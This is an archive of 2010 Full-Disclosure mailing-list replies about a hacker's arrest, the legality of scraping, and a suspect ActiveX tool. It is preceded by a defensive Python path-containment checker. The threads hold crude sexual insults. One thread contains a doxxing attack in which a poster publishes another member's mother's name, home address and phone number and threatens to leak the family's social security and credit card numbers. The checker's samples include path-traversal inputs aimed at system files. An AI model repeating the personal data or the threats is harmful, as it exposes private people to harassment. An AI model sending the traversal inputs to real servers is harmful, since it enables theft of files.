

-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da
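
Added example (not part of the original thread, and not code from any project
mentioned in it): the "cd ./somerandomchars/../" behaviour quoted above is
lexical path normalization, so a file-serving check has to normalize first and
then test containment. The base directory and sample paths are constructed.

```python
import ntpath  # Windows path rules; importable on any OS, touches no files

# Constructed base directory for the example (an assumption, not from the thread).
BASE = "C:\\site\\media"


def collapse(path):
    """Lexically normalize a Windows path.

    "name\\.." is cancelled as text, whether or not "name" exists on disk,
    which is the behaviour the quoted 'cd' session shows.
    """
    return ntpath.normpath(path)


def resolve_under_base(base, user_path):
    """Return the normalized target if it stays inside base, else None.

    This is a lexical check only; junctions and symlinks need an additional
    comparison of resolved paths on the real host.
    """
    base_abs = ntpath.normpath(base)
    # ntpath.join discards base when user_path is rooted or names a drive,
    # so those inputs are caught by the containment test below.
    target = ntpath.normpath(ntpath.join(base_abs, user_path))
    # Compare case-insensitively and with a trailing separator so that
    # C:\site\media2 is not mistaken for a child of C:\site\media.
    base_key = ntpath.normcase(base_abs).rstrip("\\") + "\\"
    target_key = ntpath.normcase(target)
    if target_key + "\\" == base_key or target_key.startswith(base_key):
        return target
    return None


# Constructed sample requests.
SAMPLES = [
    "episodes/Show01.MP3",                   # ordinary file below the base
    "ghost/../episodes/a.mp3",               # bogus directory, stays inside
    "./somerandomchars/../../../boot.ini",   # bogus directory, climbs out
    "..\\media2\\x.mp3",                     # sibling sharing the name prefix
    "\\Windows\\win.ini",                    # rooted path replaces the base
    "D:foo",                                 # drive-relative path
]


def check_samples():
    """Map each sample request to its resolved path or None (rejected)."""
    return {s: resolve_under_base(BASE, s) for s in SAMPLES}


if __name__ == "__main__":
    print(collapse("C:\\./somerandomchars/../"))
    for request, result in check_samples().items():
        print(f"{request!r:45} -> {result}")
```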

Re: [Full-disclosure] Congratulations Andrew

2010-06-24 Thread T Biehn
Ouch dude:
http://www.cbc.ca/canada/toronto/story/2010/06/23/tor-g20-arrest.html

Guess you ate a dick too.

On Wed, Jun 16, 2010 at 7:05 PM, Byron Sonne  wrote:

> > Looks like Andrew/weev/n3td3v finally gets to do what he likes the most
> > Performing fellatio on his fellow inmates
> > http://www.theregister.co.uk/2010/06/16/auernheimer_arrested/
>
> Oh man, pretty sweet! I've been waiting years to see weev eat a dick,
> and the time has come at last.
>
> Maybe there is a god.
>
> --
> Byron L. Sonne :: blso...@halvdan.com :: www.halvdan.com
> gpg: 0x69D9EAA6, C651 EF07 1298 58B3 615D 4019 E196 BAE1 69D9 EAA6
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da

Re: [Full-disclosure] No anti-virus software? No internet connection

2010-06-24 Thread T Biehn
I wonder if someone writes down all that pseudo-intellectual philosophical
bullshit that is so carefully crafted by FD members (myself included)?
Maybe I should:
???
Profit

-Travis

On Thu, Jun 24, 2010 at 5:45 AM, Walter van Holst <
walter.van.ho...@xs4all.nl> wrote:

> On Thu, June 24, 2010 11:08, valdis.kletni...@vt.edu wrote:
>
> >> The answer to that kind of question is quite often related to the
> >> industry average. For example no more failures than one standard
> >> deviation below the industry average.
> >
> > Ahh.. but that doesn't really help either.  Consider that not all
> > failures
> > are created equal.  Should a failure to detect some unknown basically
> > harmless
> > strain that's only been seen on 4 machines in Zimbabwe count the same
> > as
> > failing to notice that a machine is still infected with Code Red or
> > something
> > that's virulent and malicious and on a very large current burn?  Do
> > you even
> > care it didn't detect the Zimbabwe strain your machine has never been
> > exposed to?
>
> Of course any way of measuring it will be fundamentally flawed in
> certain ways. There is always that pesky 80/20 or 90/10 rule. And you
> can of course figure out a way of correcting for corner cases, but
> that will only create additional corner cases. That's what makes
> lawyering on product liability a craft at best and usually some form
> of black magic.
>
> > For that matter, do you really want to create a situation where the
> > various
> > A/V companies now have an *incentive* to make sure their competitors
> > don't
> > detect something (either by failing to share data, or resorting to
> > having
> > malware custom-crafted)?  The only reason the whole A/V industry
>
> And yes, there may very well be unintended consequences. Nonetheless,
> I feel the era of complete exoneration from product liability is
> coming to an end for packaged software. Especially in the security
> industry. It is just a matter of an 'unsafe at any speed' moment
> occurring and there will be legislation, however braindead such
> legislation may be from an engineering viewpoint.
>
> Call me a pessimist, but we've been putting way too much critical
> stuff on internet connected systems while at the same neglecting basic
> hygiene at every level not to have some disaster to happen. It isn't
> so much a question of if but when that will happen.
>
> Regards,
>
>  Walter
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da

Re: [Full-disclosure] Congratulations Andrew

2010-06-16 Thread T Biehn
Let's just call a spade a spade here:
AT&T got butthurt at the media ruin and forced the man to come down hard on
someone.
A perfect someone to restore public faith in the order of the world was
Weev.

So AT&T's lawyers drafted some bum legal pretense under which to raid weev
looking for some related incriminating content and handed it off to the
cops. Of course they were going to find something illegal on his premises,
have you seen half the shit he writes online?

This is another instance of Corporate Policy leading to unjustified Policing
action; it is the second such occurrence in the past few months. Maybe AT&T
schooled Apple in mobile networking and in turn Apple schooled AT&T in
corporate control of public police forces.

-Travis

On Wed, Jun 16, 2010 at 4:12 PM, T Biehn  wrote:

> Furthermore if I access an online resource and I notice that the
> information ends and the URL has a &page=1 on the end and no link exists on
> that page to say... &page=2 is that illegal?
> On the same note, if I notice something that looks like a SELECT statement
> in a URL (due to excellent coding) is it illegal for me to modify that
> SELECT statement to return other information?
> Is the legality of access to the resource something that must be explicitly
> granted to me or is it some abstract property depending on the content I've
> accessed? Is it legal to randomly fuzz web service arguments without knowing
> the data that it will return?
>
> Usually systems of this nature will have an EXPLICIT notice that you cannot
> access data on it unless you're authorized OR will require (as it does now)
> authentication.
>
> Did the ICCID count as authentication if it is not explicitly labeled by
> AT&T as such? A field like:
> &password would clearly be illegal to brute force.
>
> An analogy to a case with CLEARLY AND EXPLICITLY defined law regarding
> private property doesn't really seem to fit.
>
> -Travis
>
>
>
> On Wed, Jun 16, 2010 at 3:58 PM, T Biehn  wrote:
>
>> So what grants you legal access to aol.com (HTTP port 80 get / )?
>> I'm confused? Does search engine indexing grant legal access to online
>> resources?
>>
>> -Travis
>>
>>
>> On Wed, Jun 16, 2010 at 3:34 PM, Thor (Hammer of God) <
>> t...@hammerofgod.com> wrote:
>>
>>> By the same logic, then yes you would.  Which is why the statement “if a
>>> system has no password, then you have a legal right to whatever data is on
>>> it” is complete horse hockey.
>>>
>>>
>>>
>>> Don’t take technical advice from your lawyer, and don’t take legal advice
>>> from people on security lists.
>>>
>>>
>>>
>>> t
>>>
>>>
>>>
>>> *From:* full-disclosure-boun...@lists.grok.org.uk [mailto:
>>> full-disclosure-boun...@lists.grok.org.uk] *On Behalf Of *wilder_jeff
>>> Wilder
>>> *Sent:* Wednesday, June 16, 2010 11:56 AM
>>> *To:* full-disclosure@lists.grok.org.uk
>>>
>>> *Subject:* Re: [Full-disclosure] Congratulations Andrew
>>>
>>>
>>>
>>>
>>> By that same standard.. if you leave your house unlocked does that
>>> give someone the right to enter it?
>>>
>>> just my thoughts
>>> --
>>>
>>> Date: Wed, 16 Jun 2010 19:58:27 +0200
>>> From: uuf6...@gmail.com
>>> To: tbi...@gmail.com
>>> CC: full-disclosure@lists.grok.org.uk; valdis.kletni...@vt.edu
>>> Subject: Re: [Full-disclosure] Congratulations Andrew
>>>
>>> Reminds me of Al Capone and tax evasion ;-)
>>>
>>> Good ol' America.
>>>
>>>
>>>
>>> On Wed, Jun 16, 2010 at 7:49 PM, T Biehn  wrote:
>>>
>>> Yes.
>>> The FBI was investigating the AT&T incident, presumably the AT&T incident
>>> was what the fed were serving against.
>>> What possible valid search warrant could be executed? There was no hack,
>>> breach, illegal access of data, or anything else for that matter.
>>>
>>> If you leave a system online with no password which allows you to scrape
>>> content you have a legal right to scrape that content.
>>>
>>> -Travis
>>>
>>>
>>>
>>> On Wed, Jun 16, 2010 at 11:10 AM,  wrote:
>>>
>>> On Wed, 16 Jun 2010 10:09:22 EDT, T Biehn said:
>>>
>>> > I doubt the search warrant will hold up in court.
>>>
>>> Do you have any actual basis for saying that?  Sure, the warrant might be
>>> bullshit, it

Re: [Full-disclosure] Congratulations Andrew

2010-06-16 Thread T Biehn
Furthermore if I access an online resource and I notice that the information
ends and the URL has a &page=1 on the end and no link exists on that page to
say... &page=2 is that illegal?
On the same note, if I notice something that looks like a SELECT statement
in a URL (due to excellent coding) is it illegal for me to modify that
SELECT statement to return other information?
Is the legality of access to the resource something that must be explicitly
granted to me or is it some abstract property depending on the content I've
accessed? Is it legal to randomly fuzz web service arguments without knowing
the data that it will return?

Usually systems of this nature will have an EXPLICIT notice that you cannot
access data on it unless you're authorized OR will require (as it does now)
authentication.

Did the ICCID count as authentication if it is not explicitly labeled by
AT&T as such? A field like:
&password would clearly be illegal to brute force.

An analogy to a case with CLEARLY AND EXPLICITLY defined law regarding
private property doesn't really seem to fit.

-Travis


On Wed, Jun 16, 2010 at 3:58 PM, T Biehn  wrote:

> So what grants you legal access to aol.com (HTTP port 80 get / )?
> I'm confused? Does search engine indexing grant legal access to online
> resources?
>
> -Travis
>
>
> On Wed, Jun 16, 2010 at 3:34 PM, Thor (Hammer of God) <
> t...@hammerofgod.com> wrote:
>
>> By the same logic, then yes you would.  Which is why the statement “if a
>> system has no password, then you have a legal right to whatever data is on
>> it” is complete horse hockey.
>>
>>
>>
>> Don’t take technical advice from your lawyer, and don’t take legal advice
>> from people on security lists.
>>
>>
>>
>> t
>>
>>
>>
>> *From:* full-disclosure-boun...@lists.grok.org.uk [mailto:
>> full-disclosure-boun...@lists.grok.org.uk] *On Behalf Of *wilder_jeff
>> Wilder
>> *Sent:* Wednesday, June 16, 2010 11:56 AM
>> *To:* full-disclosure@lists.grok.org.uk
>>
>> *Subject:* Re: [Full-disclosure] Congratulations Andrew
>>
>>
>>
>>
>> By that same standard.. if you leave your house unlocked does that
>> give someone the right to enter it?
>>
>> just my thoughts
>> --
>>
>> Date: Wed, 16 Jun 2010 19:58:27 +0200
>> From: uuf6...@gmail.com
>> To: tbi...@gmail.com
>> CC: full-disclosure@lists.grok.org.uk; valdis.kletni...@vt.edu
>> Subject: Re: [Full-disclosure] Congratulations Andrew
>>
>> Reminds me of Al Capone and tax evasion ;-)
>>
>> Good ol' America.
>>
>>
>>
>> On Wed, Jun 16, 2010 at 7:49 PM, T Biehn  wrote:
>>
>> Yes.
>> The FBI was investigating the AT&T incident, presumably the AT&T incident
>> was what the fed were serving against.
>> What possible valid search warrant could be executed? There was no hack,
>> breach, illegal access of data, or anything else for that matter.
>>
>> If you leave a system online with no password which allows you to scrape
>> content you have a legal right to scrape that content.
>>
>> -Travis
>>
>>
>>
>> On Wed, Jun 16, 2010 at 11:10 AM,  wrote:
>>
>> On Wed, 16 Jun 2010 10:09:22 EDT, T Biehn said:
>>
>> > I doubt the search warrant will hold up in court.
>>
>> Do you have any actual basis for saying that?  Sure, the warrant might be
>> bullshit, it might be solid - the article doesn't give us enough info
>> either
>> way to tell.
>>
>> "Auernheimer was also arrested in March for giving a false name to law
>> enforcement officers responding to a parking complaint."
>>
>> Sad.  The dude may have the intelligence to pull the hack, but not have
>> the
>> wisdom to not dig a hole deeper. Just man up and take the frikking parking
>> ticket. ;)
>>
>>
>>
>> --
>> FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
>> http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
>> http://pastebin.com/f6fd606da
>>
>>
>

Re: [Full-disclosure] Congratulations Andrew

2010-06-16 Thread T Biehn
So what grants you legal access to aol.com (HTTP port 80 get / )?
I'm confused? Does search engine indexing grant legal access to online
resources?

-Travis

On Wed, Jun 16, 2010 at 3:34 PM, Thor (Hammer of God)
wrote:

> By the same logic, then yes you would.  Which is why the statement “if a
> system has no password, then you have a legal right to whatever data is on
> it” is complete horse hockey.
>
>
>
> Don’t take technical advice from your lawyer, and don’t take legal advice
> from people on security lists.
>
>
>
> t
>
>
>
> *From:* full-disclosure-boun...@lists.grok.org.uk [mailto:
> full-disclosure-boun...@lists.grok.org.uk] *On Behalf Of *wilder_jeff
> Wilder
> *Sent:* Wednesday, June 16, 2010 11:56 AM
> *To:* full-disclosure@lists.grok.org.uk
>
> *Subject:* Re: [Full-disclosure] Congratulations Andrew
>
>
>
>
> By that same standard.. if you leave your house unlocked does that give
> someone the right to enter it?
>
> just my thoughts
> --
>
> Date: Wed, 16 Jun 2010 19:58:27 +0200
> From: uuf6...@gmail.com
> To: tbi...@gmail.com
> CC: full-disclosure@lists.grok.org.uk; valdis.kletni...@vt.edu
> Subject: Re: [Full-disclosure] Congratulations Andrew
>
> Reminds me of Al Capone and tax evasion ;-)
>
> Good ol' America.
>
>
>
> On Wed, Jun 16, 2010 at 7:49 PM, T Biehn  wrote:
>
> Yes.
> The FBI was investigating the AT&T incident, presumably the AT&T incident
> was what the fed were serving against.
> What possible valid search warrant could be executed? There was no hack,
> breach, illegal access of data, or anything else for that matter.
>
> If you leave a system online with no password which allows you to scrape
> content you have a legal right to scrape that content.
>
> -Travis
>
>
>
> On Wed, Jun 16, 2010 at 11:10 AM,  wrote:
>
> On Wed, 16 Jun 2010 10:09:22 EDT, T Biehn said:
>
> > I doubt the search warrant will hold up in court.
>
> Do you have any actual basis for saying that?  Sure, the warrant might be
> bullshit, it might be solid - the article doesn't give us enough info
> either
> way to tell.
>
> "Auernheimer was also arrested in March for giving a false name to law
> enforcement officers responding to a parking complaint."
>
> Sad.  The dude may have the intelligence to pull the hack, but not have the
> wisdom to not dig a hole deeper. Just man up and take the frikking parking
> ticket. ;)
>
>
>
> --
> FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
> http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
> http://pastebin.com/f6fd606da
>
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da

Re: [Full-disclosure] Congratulations Andrew

2010-06-16 Thread T Biehn
Yes.
The FBI was investigating the AT&T incident, presumably the AT&T incident
was what the fed were serving against.
What possible valid search warrant could be executed? There was no hack,
breach, illegal access of data, or anything else for that matter.

If you leave a system online with no password which allows you to scrape
content you have a legal right to scrape that content.

-Travis

On Wed, Jun 16, 2010 at 11:10 AM,  wrote:

> On Wed, 16 Jun 2010 10:09:22 EDT, T Biehn said:
>
> > I doubt the search warrant will hold up in court.
>
> Do you have any actual basis for saying that?  Sure, the warrant might be
> bullshit, it might be solid - the article doesn't give us enough info
> either
> way to tell.
>
> "Auernheimer was also arrested in March for giving a false name to law
> enforcement officers responding to a parking complaint."
>
> Sad.  The dude may have the intelligence to pull the hack, but not have the
> wisdom to not dig a hole deeper. Just man up and take the frikking parking
> ticket. ;)
>
>


-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da

Re: [Full-disclosure] Congratulations Andrew

2010-06-16 Thread T Biehn
Didn't Philip K. Dick write about this sort of thing in Radio Free Albemuth?
I doubt the search warrant will hold up in court.

-Travis

On Wed, Jun 16, 2010 at 9:27 AM, Milan Berger <
m.ber...@project-mindstorm.net> wrote:

> > Looks like Andrew/weev/n3td3v finally gets to do what he likes the
> > most
> > Performing fellatio on his fellow inmates
> > http://www.theregister.co.uk/2010/06/16/auernheimer_arrested/
>
> looks too good to be true.
> Is the longlife FD really away? Would be great!
>
> --
> Kind Regards
>
> Milan Berger
> Project-Mindstorm Technical Engineer
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da

Re: [Full-disclosure] Microsoft Windows Help Centre Handles Malformed Escape Sequences Incorrectly

2010-06-11 Thread T Biehn
So far so good.
You've been able to go from t biehn -> Travis Biehn -> Bomber Article
(parent's names, city, state, country) -> whitepages.com (Address and Phone
number) -> (not clear on your jump here, did you google their name or for
the address?) Real estate listings.
Now to pull the SS and CC #'s you're going to have to go the extra mile. I'd
enjoy seeing you pull our SS numbers, being that we're all Canadians.

-Travis

On Fri, Jun 11, 2010 at 1:50 PM, musnt live  wrote:

> On Fri, Jun 11, 2010 at 1:43 PM, T Biehn  wrote:
> > Maybe you can call twice and get both of them really upset?
> >
>
> Maybe I will. Would she let me sit on her bed?
>
> http://images.realogyfg.com/j/2/5/15907460/62A47ADD-C353-4F73-94FB-742937D88A0B-6.jpg
>
> Oh n00z all this information for on this little wannabe unabummer. Go
> play now with some explosives and fux0r yourself before I is posting
> your family's SS CC #'s rookie
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da

Re: [Full-disclosure] Microsoft Windows Help Centre Handles Malformed Escape Sequences Incorrectly

2010-06-11 Thread T Biehn
Maybe you can call twice and get both of them really upset?

-Travis

On Fri, Jun 11, 2010 at 1:21 PM, musnt live  wrote:

> On Fri, Jun 11, 2010 at 1:06 PM, T Biehn  wrote:
> > Totally, I'd work on getting a dog too.
> >
> > On Jun 11, 2010 12:20 PM, "musnt live"  wrote:
> >
> > On Fri, Jun 11, 2010 at 12:03 PM, T Biehn  wrote:
> >> It's a good thing I ran that a...
> >
> > It's a good thing there is to be a local bomb squad near me.
> >
> > http://www.cbc.ca/world/story/2005/06/13/canadian-bomb050613.html
> >
>
> Is Annette (your mom) available? A call to her could always have her
> be answer for herself:
>
> Annette Biehn (former known to be Annette Penney)
> 3395 Gail Circle
> Doylestown, PA  18901
> (215) 794-9220
>
> Or maybe so your dad Brant to be upset
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da

Re: [Full-disclosure] Microsoft Windows Help Centre Handles Malformed Escape Sequences Incorrectly

2010-06-11 Thread T Biehn
Totally, I'd work on getting a dog too.

On Jun 11, 2010 12:20 PM, "musnt live"  wrote:

On Fri, Jun 11, 2010 at 12:03 PM, T Biehn  wrote:
> It's a good thing I ran that a...
It's a good thing there is to be a local bomb squad near me.

http://www.cbc.ca/world/story/2005/06/13/canadian-bomb050613.html

Re: [Full-disclosure] Microsoft Windows Help Centre Handles Malformed Escape Sequences Incorrectly

2010-06-11 Thread T Biehn
It's a good thing I ran that anti-hacker script!!!

On Fri, Jun 11, 2010 at 11:28 AM, Benji  wrote:

> because when she gets 0wn3d she can be all like 'ruh roh, well, 0day
> can happen to anyone'
>
> On Fri, Jun 11, 2010 at 4:01 PM, Benjamin Franz 
> wrote:
> > On 06/11/2010 02:40 AM, Christian Sciberras wrote:
> >> In my humble opinion, he could have waited a couple more days just in
> >> case Microsoft decided to do the unprecedented.
> >> In which case, I progressive change of policies at Microsoft are
> >> better than a couple of users getting hacked from pron sites...
> > As I said: Travis indicated in his original post he believes the exploit
> > *was already being used in the wild*. So NOT releasing it wouldn't
> > protect users. It would just keep it "secret" from everyone except
> > Microsoft *and the black hats who were already using it*. While
> > maintaining a false air of intact security for everyone else.
> >
> > That is better, how?
> >
> > --
> > Benjamin Franz
> >



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da

Re: [Full-disclosure] Hacxx Anti Malware for Windows XP

2010-06-07 Thread T Biehn
I installed it too, and then I noticed a few other websites that were asking
me for activex privileges as well so I accepted their anti-malware. Now I'm
unhackable.

-Travis

On Mon, Jun 7, 2010 at 4:32 PM, Christian Sciberras wrote:

> I'm new to computers, what is wrong with antimalware programs?
>
>
> And you're subscribed to this list? You don't install anything anyone
> throws around, especially when not from a trusted source...
>
>
>
>
>
> On Mon, Jun 7, 2010 at 10:31 PM, Benji  wrote:
>
>> I'm new to computers, what is wrong with antimalware programs?
>>
>> On Mon, Jun 7, 2010 at 9:28 PM, Christian Sciberras 
>> wrote:
>> > Uhm...just clear those registry entries?
>> >
>> >
>> >
>> > Don't tell me you *did* install it? ;)
>> >
>> > You know what they say about cats and curiosity
>> >
>> >
>> >
>> >
>> > On Mon, Jun 7, 2010 at 10:23 PM, Benji  wrote:
>> >>
>> >> on an unrelated note, would anyone know how to uninstall this?
>> >>
>> >> thx intentrnets.
>> >>
>> >> On Mon, Jun 7, 2010 at 4:27 PM, T Biehn  wrote:
>> >> > Actually,
>> >> > The code is clean (Yes I looked), other than him setting his website
>> as
>> >> > the
>> >> > search provider for IE.
>> >> >
>> >> > -Travis
>> >> >
>> >> > On Mon, Jun 7, 2010 at 10:49 AM,  wrote:
>> >> >>
>> >> >> All it takes is one. Same with the email spamming crap
>> >> >>
>> >> >>
>> >> >> Sent on the Sprint® Now Network from my BlackBerry®
>> >> >>
>> >> >> -Original Message-
>> >> >> From: netinfinity 
>> >> >> Date: Mon, 7 Jun 2010 16:17:28
>> >> >> To: 
>> >> >> Subject: Re: [Full-disclosure] Hacxx Anti Malware for Windows XP
>> >> >>
>> >> >
>> >> >
>> >> >
>> >> > --
>> >> > FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
>> >> >
>> >> >
>> http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
>> >> > http://pastebin.com/f6fd606da
>> >> >
>> >
>> >
>>
>
>


-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da

Re: [Full-disclosure] Hacxx Anti Malware for Windows XP

2010-06-07 Thread T Biehn
Actually,
The code is clean (Yes I looked), other than him setting his website as the
search provider for IE.

-Travis

On Mon, Jun 7, 2010 at 10:49 AM,  wrote:

> All it takes is one. Same with the email spamming crap
>
>
> Sent on the Sprint® Now Network from my BlackBerry®
>
> -Original Message-
> From: netinfinity 
> Date: Mon, 7 Jun 2010 16:17:28
> To: 
> Subject: Re: [Full-disclosure] Hacxx Anti Malware for Windows XP
>
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da

Re: [Full-disclosure] Hacxx Anti Malware for Windows XP

2010-06-07 Thread T Biehn
What the fuck.

On Mon, Jun 7, 2010 at 7:52 AM, hacxx20  wrote:

> Hi,
>
> I have been developing a tool in batch to block general malware for
> some time now and recently I found an exploit that can add the
> registry keys from a web browser.
>
> Hacxx Anti Malware for Windows XP blocks virus and worms using known
> filenames.
>
> To install it simply visit http:///antimalware.x10.bz and click in Run
> Hacxx Anti Malware.
> You must accept the ActiveX and the source is available in the site.
>
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da

Re: [Full-disclosure] The_UT is repenting

2010-06-01 Thread T Biehn
I don't think UT is anyone's 'boy toy.' The guy is massive.

I'm sure he'll meet all kinds of experienced scam artists and criminals and
learn all sorts of neat things for use when he gets out.

-Travis

On Tue, Jun 1, 2010 at 6:13 AM, Anders Klixbull  wrote:

> I'm so sorry that your friend was retarded enough to get busted.
> And thank you for the archive!
> It's always nice to have a personal librarian :)
> You may be sorry for the repeat material, but please go suck a lemon.
> Thanks.
>
> -Original message-
> From: ghost [mailto:gho...@gmail.com]
> Sent: 1 June 2010 11:35
> To: Anders Klixbull
> Cc: full-disclosure@lists.grok.org.uk
> Subject: Re: [Full-disclosure] The_UT is repenting
>
> Anders - I'm very sorry, you must have confused this mailing list with
> astalavista forums. Please go away... or kill yourself, whichever you
> prefer.. and in the interest of full-disclosure, I have my fingers
> crossed for the latter :)
>
> Thanks.
>
>
> -
>
> Re:
> by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
> Please stop stating the obvious. Keep in mind that to us your useless
> replies are of no importance.
>
> Re:
> by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
> But their website graphics is super cool!
>
> Re:
> by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
> we care we really do From fulldisclosureboun...@list...
>
> Re:
> by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
> take a chill pill wigger
>
> Re:
> by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
> shut the fuck up From fulldisclosureboun...@list...
>
> Re:
> by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
> then you gadi and n3td3v should jump off a cliff
>
> Re:
> by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
> Apology not accepted! Alcohol is required!
>
> Re:
> by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
> ) If im ever near there i will look you up! Cheers
>
> Re:
> by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
> Thinking a little highly of yourself arent you? Saving the world lol
> lol lol Keep your moronic comics to yourself please
>
> Re:
> by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
> 0day pictures of Mark's mom for sale From fulldisclosureboun...@list...
>
> Re:
> by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
> Keep your talentless tripe to yourself
>
> Re:
> by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
> You're obviously retarded
>
> Re:
> by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
> You forgot to include MiniMySqlat0r01.jar in your zip file..
>
> Re:
> by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
>  !
>
> Re:
> by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
> Free 0day for all!!
>
> Re:
> by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
> Fuck the vendors put them on FD
>
> Re:
> by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
> Go suck a lemon bitch
>
> Re:
> by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
> The hardcore cockgobbler scene of scotland
>
> Re:
> by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
> TEH TXT FIEL FORMATTING SI TEH FUCKED From fulldisclosureboun...@list...
>
> Re:
> by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
> Religion is nothing more than mental crutches for weakminded people
>
> Message Results
>
> Re:
> by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
> But isnt that where you feel most at home brother n3td3v?
>
> Re:
> by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
> Because we are drawn to you like moths to a flame
>
> Re:
> by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
> It's safe to assume that it covers the both of you ignorant turds
>
> Re:
> by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
> Nice teenspeak maybe your mother can invite n3td3v over to hot cocoa
> and cookies?
>
> Re:
> by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
> removing anyone is pointless From fulldisclosureboun...@list...
>
> Re:
> by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
> Project chroma project? Welcome to the redundancy department of
> redundancy.. Mike c aka n3td3v shut the fuck up
>
> Re:
> by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
> retardo
>
> Re:
> by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages)
> Are you smoking crack?
>
> Re:
> by Anders Klixbull in full-disclosure@lists.

Re: [Full-disclosure] What do you guys think about it?

2010-05-31 Thread T Biehn
How is it open to debate?
He tells you where security as a career isn't dead. You act as a cog in the
SaaS machine. You research stuff.

The system admin who specializes in security has died and given way to the
specialized sys admin and a purely security oriented individual. The
security oriented individuals work for your sourcefires of the world.

-Travis


On Mon, May 31, 2010 at 5:14 PM, Christian Sciberras wrote:

> Regardless of merit, it is open to debate. Let's just hypothesize that it
> was.
>
> ;-)
>
>
>
>
> On Mon, May 31, 2010 at 6:23 PM, T Biehn  wrote:
>
>> If you thought this article had any merit then it is true for you.
>> Swap over to Hamburger University kids, nothing to see here.
>>
>> If you thought this article was bullshit then that is true for you.
>>
>> It's just too bad this wasn't by design, eh?
>>
>> -Travis
>>
>>
>> On Mon, May 31, 2010 at 12:04 PM, Georgi Guninski 
>> wrote:
>>
>>> why discriminate the gals?
>>>
>>> if we are lucky there may be a gal or 2 left on the nice list ;)
>>>
>>> On Fri, May 28, 2010 at 04:18:58PM -0300, Rafael Moraes wrote:
>>> > Read and give your opinion!
>>> >
>>> > http://www.networkworld.com/community/node/60303
>>> >
>>> > --
>>> > Regards,
>>> > Rafael Moraes
>>> > Linux Professional Institute Certified - LPI 2
>>> > Novell Certified Linux Administrator - CLA
>>> > Data Center Technical Specialist - DCTS
>>> > ITIL Foundations Certified
>>>
>>>
>>>
>>
>>
>>
>> --
>> FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
>> http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
>> http://pastebin.com/f6fd606da
>>
